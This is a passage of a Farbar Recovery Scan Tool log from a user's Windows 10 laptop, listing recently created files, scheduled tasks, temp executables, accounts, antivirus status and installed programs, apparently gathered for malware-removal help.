2016-03-13 14:15 - 2016-03-13 14:27 - 22908888 _____ (Malwarebytes ) C:\Users\RoNiN\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-13 14:04 - 2016-03-13 14:04 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\MCorp
2016-03-11 19:39 - 2016-03-11 19:39 - 07600640 _____ C:\Users\RoNiN\AppData\Roaming\agent.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 01786944 _____ C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-11 19:39 - 2016-03-11 19:39 - 00018432 _____ C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:38 - 2016-03-11 19:38 - 00072729 _____ C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2016-03-11 19:36 - 2016-03-22 01:44 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-11 19:33 - 2016-03-25 15:00 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-11 19:33 - 2016-03-11 19:33 - 00003416 _____ C:\WINDOWS\System32\Tasks\Lhsorj
2016-03-11 19:32 - 2016-03-13 14:35 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Tempfolder
2016-03-11 19:32 - 2016-03-11 19:32 - 00127488 _____ C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:32 - 2016-03-11 19:32 - 00000000 ____D C:\uninst
2016-03-11 19:27 - 2016-03-23 16:05 - 00000000 ____D C:\ProgramData\DataFile
2016-03-11 19:27 - 2016-03-11 19:27 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
2016-03-11 19:24 - 2016-03-11 19:24 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-03-11 19:18 - 2016-03-11 19:16 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-03-10 23:17 - 2016-03-10 23:17 - 00000000 ____D C:\Users\RoNiN\AppData\Local\CEF
2016-03-10 14:32 - 2016-03-10 23:19 - 00000000 ____D C:\Users\RoNiN\Downloads\DMBDMB
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 16:27 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-09 16:23 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-09 16:21 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-09 16:20 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-09 16:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-09 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-09 16:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-09 16:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 01:22 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 23:31 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-08 15:54 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-04-05 12:56 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 18:59 - 2015-11-04 19:30 - 00000000 ____D C:\WINDOWS\Panther
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
2016-03-14 22:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-03-14 19:01 - 2013-11-10 15:08 - 00000000 ____D C:\WINDOWS\pss
2016-03-13 19:51 - 2011-12-12 02:14 - 00000008 __RSH C:\ProgramData\ntuser.pol
2016-03-13 19:21 - 2015-02-14 12:26 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\TeamViewer
2016-03-13 19:21 - 2011-03-24 03:30 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Mozilla
2016-03-13 17:24 - 2015-07-30 18:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-13 14:00 - 2015-09-10 01:42 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2016-03-13 13:02 - 2016-01-13 09:24 - 00000000 ____D C:\WINDOWS\system32\NV
2016-03-11 19:12 - 2015-07-12 12:14 - 00000000 ____D C:\ProgramData\Package Cache
2016-03-10 23:34 - 2015-07-30 17:49 - 00342192 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-10 23:27 - 2015-07-30 18:42 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-10 23:23 - 2010-10-24 03:29 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Azureus
2016-03-10 23:20 - 2010-11-03 00:18 - 00000000 ____D C:\Users\RoNiN\Documents\Vuze Downloads
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
2015-07-12 12:16 - 2015-07-12 12:22 - 0000112 _____ () C:\ProgramData\WceNM3o.dat
 
Files to move or delete:
====================
C:\ProgramData\WceNM3o.dat
C:\Users\RoNiN\autoplaylist.dat
C:\Users\RoNiN\cddbcontrol.dll
C:\Users\RoNiN\cddblink.dll
C:\Users\RoNiN\cddbmusicid.dll
C:\Users\RoNiN\convert.exe
C:\Users\RoNiN\dbghelp.dll
C:\Users\RoNiN\dunzip32.dll
C:\Users\RoNiN\fixrjb.exe
C:\Users\RoNiN\hxaudiodevicehook.dll
C:\Users\RoNiN\ierjplug.dll
C:\Users\RoNiN\keys.dat
C:\Users\RoNiN\mc_enc_h263.dll
C:\Users\RoNiN\mediainfo.dll
C:\Users\RoNiN\mmcdda32.dll
C:\Users\RoNiN\rdsf3260.dll
C:\Users\RoNiN\realcleaner.exe
C:\Users\RoNiN\realconverter.exe
C:\Users\RoNiN\realjbox.exe
C:\Users\RoNiN\realplay.exe
C:\Users\RoNiN\realshare.exe
C:\Users\RoNiN\realtrimmer.exe
C:\Users\RoNiN\rjbres.dll
C:\Users\RoNiN\rjdlg.dll
C:\Users\RoNiN\rjprog.dll
C:\Users\RoNiN\rjwmapln.dll
C:\Users\RoNiN\rndevicedbbuilder.exe
C:\Users\RoNiN\rpau3260.dll
C:\Users\RoNiN\rphelperapp.exe
C:\Users\RoNiN\rpplugprot.dll
C:\Users\RoNiN\rpshell.dll
C:\Users\RoNiN\rpshellextension.dll
C:\Users\RoNiN\rpshellsearch.dll
C:\Users\RoNiN\rpwa3260.dll
C:\Users\RoNiN\strs23.dat
C:\Users\RoNiN\strs26.dat
C:\Users\RoNiN\tnetdtct.dll
C:\Users\RoNiN\tpasdk.dll
C:\Users\RoNiN\tsasdk.dll
C:\Users\RoNiN\wmdmhelper.dll
 
 
Some files in TEMP:
====================
C:\Users\RoNiN\AppData\Local\Temp\392590059.exe
C:\Users\RoNiN\AppData\Local\Temp\523578965.exe
C:\Users\RoNiN\AppData\Local\Temp\ARCompanionForSession1.exe
C:\Users\RoNiN\AppData\Local\Temp\dsHostCheckerSetup.exe
C:\Users\RoNiN\AppData\Local\Temp\Execute2App.exe
C:\Users\RoNiN\AppData\Local\Temp\File_Downloader.exe
C:\Users\RoNiN\AppData\Local\Temp\i4jdel0.exe
C:\Users\RoNiN\AppData\Local\Temp\io1.exe
C:\Users\RoNiN\AppData\Local\Temp\jre-8u73-windows-au.exe
C:\Users\RoNiN\AppData\Local\Temp\JuniperSetupClientInstaller.exe
C:\Users\RoNiN\AppData\Local\Temp\libeay32.dll
C:\Users\RoNiN\AppData\Local\Temp\lowproc.exe
C:\Users\RoNiN\AppData\Local\Temp\msvcp90.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr120.dll
C:\Users\RoNiN\AppData\Local\Temp\msvcr90.dll
C:\Users\RoNiN\AppData\Local\Temp\sqlite3.dll
C:\Users\RoNiN\AppData\Local\Temp\stubhelper.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================
 
 
Additon::::
Additional scan result of Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
Ran by RoNiN (2016-04-09 16:31:06)
Running from C:\virus
Windows 10 Home (X64) (2015-10-03 12:41:30)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-470165136-1162808608-978993673-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-470165136-1162808608-978993673-503 - Limited - Disabled)
Guest (S-1-5-21-470165136-1162808608-978993673-501 - Limited - Disabled)
Mcx1-RONIN-LAPTOP (S-1-5-21-470165136-1162808608-978993673-1013 - Limited - Enabled)
postgres (S-1-5-21-470165136-1162808608-978993673-1005 - Limited - Enabled) => C:\Users\postgres
RoNiN (S-1-5-21-470165136-1162808608-978993673-1001 - Administrator - Enabled) => C:\Users\RoNiN
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Emsisoft Anti-Malware (Enabled - Up to date) {15510D9D-6530-DA29-224F-7BA1BDD1CB58}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Emsisoft Anti-Malware (Enabled - Up to date) {AE30EC79-430A-D5A7-18FF-40D3C65681E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
888pokerNJ (HKLM-x32\...\888pokerNJ) (Version:  - )
abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version:  - )
AC3Filter (remove only) (HKLM-x32\...\AC3Filter) (Version:  - )
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Flash Player 10 ActiveX 64-bit (HKLM\...\Adobe Flash Player ActiveX 64) (Version: 10.2.161.23 - Adobe Systems Incorporated)
Adobe Flash Player 16 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Amazon Music (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\Amazon Amazon Music) (Version: 3.1.0.570 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AnyDVD (HKLM-x32\...\AnyDVD) (Version: 6.7.8.0 - SlySoft)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Magic-i Visual Effects 2 (HKLM-x32\...\{8E90189A-A5D4-4C0E-A908-06C4236F98EE}) (Version: 2.0.10.94 - ArcSoft)
ArcSoft Print Creations - Album Page (HKLM-x32\...\{E6B4117F-AC59-4B13-9274-EB136E8897EE}) (Version:  - ArcSoft)
ArcSoft Print Creations - Brochures & Flyers (HKLM-x32\...\{01A1A019-E1D8-482A-BE17-5E118D17C0A0}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse (HKLM-x32\...\{9591C049-5CAE-4E89-A8D9-191F1899628B}) (Version:  - ArcSoft)
ArcSoft Print Creations - Funhouse II (HKLM-x32\...\{3CE47E6B-AE27-4E40-AC54-329EED96B933}) (Version:  - ArcSoft)
ArcSoft Print Creations - Greeting Card (HKLM-x32\...\{F04F9557-81A9-4293-BC49-2C216FA325A7}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Book (HKLM-x32\...\{56589DFE-0C29-4DFE-8E42-887B771ECD23}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Calendar (HKLM-x32\...\{CA9ED5E4-1548-485B-A293-417840060158}) (Version:  - ArcSoft)
ArcSoft Print Creations - Photo Prints (HKLM-x32\...\{95F875CC-1B85-43E6-B3E0-13EA04F3D995}) (Version:  - ArcSoft)
ArcSoft Print Creations - Poster Creator (HKLM-x32\...\{5D1C82E7-7EC0-4404-A8AD-36C3B444BC34}) (Version:  - ArcSoft)
ArcSoft Print Creations - Scrapbook (HKLM-x32\...\{B0D83FCD-9D42-43ED-8315-250326AADA02}) (Version:  - ArcSoft)
ArcSoft Print Creations - Slimline Card (HKLM-x32\...\{007B37D9-0C45-4202-834B-DD5FAAE99D63}) (Version:  - ArcSoft)
ArcSoft Print Creations (HKLM-x32\...\{A3324BBB-3A83-40CE-AA8C-759D849B7EA1}) (Version: 3.0.255.487 - ArcSoft)
ArcSoft WebCam Companion 3 (HKLM-x32\...\{25478065-4CB1-448C-80E4-8C4529017EE3}) (Version: 3.0.32.354 - ArcSoft)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.6.2 - EA Digital Illusions CE AB)
BitTorrent (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\BitTorrent) (Version: 7.9.2.38398 - BitTorrent Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM-x32\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   -  )
BurnRecovery (HKLM-x32\...\{2892E1B7-E24D-4CCB-B8A7-B63D4B66F89F}) (Version: 3.0.912.401 - Micro-Star International Co., Ltd.)
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Chrome Remote Desktop Host (HKLM-x32\...\{C230A275-D2A0-446B-ACE5-06BF067D50F2}) (Version: 50.0.2661.22 - Google Inc.)
ChromecastApp (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\{079ede36-133d-44b0-8053-c7c1fa8d2e0d}_is1) (Version: 1.5.1693.0 - Google Inc.)
Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.100.14 - Citrix Systems, Inc.)
DIRECTV Player (HKLM-x32\...\{dbaba6a3-366e-43a7-8f4e-b0a868c06ab3}) (Version: 10.0 - DIRECTV)
DIRECTV2PC Playback Advisor (HKLM-x32\...\InstallShield_{479F8C12-576B-4A58-AB78-4B70F7012AA8}) (Version: 1.0 - CyberLink Corp.)
DIRECTV2PC Playback Advisor (x32 Version: 1.0 - CyberLink Corp.) Hidden
DIRECTV2PC™ (HKLM-x32\...\InstallShield_{E9B10AA5-E5F6-4DEF-A435-FB20704AF1E8}) (Version: 2.0.7507 - CyberLink Corp.)
DIRECTV2PC™ (x32 Version: 2.0.7507 - CyberLink Corp.) Hidden
Doyles Room (HKLM-x32\...\78315C9D-B2DA-4430-B077-1BDA99CCB43D) (Version: 9.4 - IGSoft)
Ear Force Audio Hub (HKLM-x32\...\{64D69874-302B-4E2C-B18C-D79667822110}) (Version: 6.6.2.0 - Turtle Beach)
ELAN Touchpad 15.9.6.1_X64_WHQL (HKLM\...\Elantech) (Version: 15.9.6.1 - ELAN Microelectronic Corp.)
Emsisoft Anti-Malware (HKLM\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 11.0 - Emsisoft Ltd.)
FairStars CD Ripper 1.90 (HKLM-x32\...\FairStars CD Ripper_is1) (Version:  - FairStars Soft)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2015 - Thrustmaster)
Final Draft (HKLM-x32\...\{7C3C895B-AE02-4F30-8A6A-051D37A38DD0}) (Version: 8.0.1.89 - Final Draft, Inc.)
Firebird SQL Server - MAGIX Edition (HKLM-x32\...\{34EB6245-C8D0-4D8A-B8D8-EEBFF7A91485}) (Version: 2.1.27.0 - MAGIX AG)
foobar2000 v1.3.8 (HKLM-x32\...\foobar2000) (Version: 1.3.8 - Peter Pawlowski)
G-Force (HKLM-x32\...\G-Force) (Version: 4.2.0 - SoundSpectrum)
Gmail POP Troubleshooter (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\GmailPopTroubleshooter) (Version: 0.1 - Google)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 49.0.2623.110 - Google Inc.)
Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
gpedt.msc 1.0 (HKLM-x32\...\{10B9C608-BF7C-4CCF-A658-C01D969DCA21}_is1) (Version:  - Richard)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.5192 - HP Photo Creations)
HP Photosmart 6510 series Basic Device Software (HKLM\...\{EB0D4D8B-A604-42D3-84D8-CCAFA75F753E}) (Version: 24.0.342.0 - Hewlett-Packard Co.)
HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)
iCloud (HKLM\...\{CE97E4D3-9F91-4D72-8A29-ED9EA90E5A15}) (Version: 2.1.3.25 - Apple Inc.)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2119 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 77 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218077F0}) (Version: 8.0.770.3 - Oracle Corporation)
JDownloader (HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\JDownloader) (Version:  - AppWork UG (haftungsbeschränkt))
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Live Update 5 (HKLM-x32\...\{E8BAA541-D161-4C9B-85BF-01F05A56BD7F}}_is1) (Version: 5.0.111 - MSI)
Logitech Harmony Remote Software 7 (HKLM-x32\...\{5C6F884D-680C-448B-B4C9-22296EE1B206}) (Version: 7.7.0.0 - Logitech)
MAGIX Music Maker 16 Download Version (HKLM-x32\...\MAGIX Music Maker 16 Download Version UK) (Version: 16.0.3.0 - MAGIX AG)
MAGIX Photo Manager 9 (HKLM-x32\...\MAGIX Photo Manager 9 UK) (Version: 7.0.3.119 - MAGIX AG)
MAGIX Screenshare (HKLM-x32\...\MAGIX Screenshare UK) (Version: 4.3.6.1987 - MAGIX AG)
MAGIX Speed burnR (HKLM-x32\...\MAGIX Speed burnR UK) (Version: 6.0.1.2 - MAGIX AG)
MAGIX Video easy SE (HKLM-x32\...\MAGIX_MSI_Video_easy_SE) (Version: 1.0.4.1 - MAGIX AG)
MAGIX Video easy SE (x32 Version: 1.0.4.1 - MAGIX AG) Hidden
Microsoft Digital Image Pro 9 (HKLM-x32\...\PictureIt_v9) (Version: 9.0.0.0000 - Microsoft Corporation)
Microsoft Expression Studio 3 (HKLM-x32\...\ExpressionStudio_3.0.1061.0) (Version: 3.0.1061.0 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office XP Professional (HKLM-x32\...\{91110409-6000-11D3-8CFE-0050048383C9}) (Version: 10.0.2627.01 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Sync Framework Runtime Native v1.0 (x86) (HKLM-x32\...\{8A74E887-8F0F-4017-AF53-CBA42211AAA5}) (Version: 1.0.1215.0 - Microsoft Corporation)
Microsoft Sync Framework Services Native v1.0 (x86) (HKLM-x32\...\{BD64AF4A-8C80-4152-AD77-FCDDF05208AB}) (Version: 1.0.1215.0 - Microsoft Corporation)
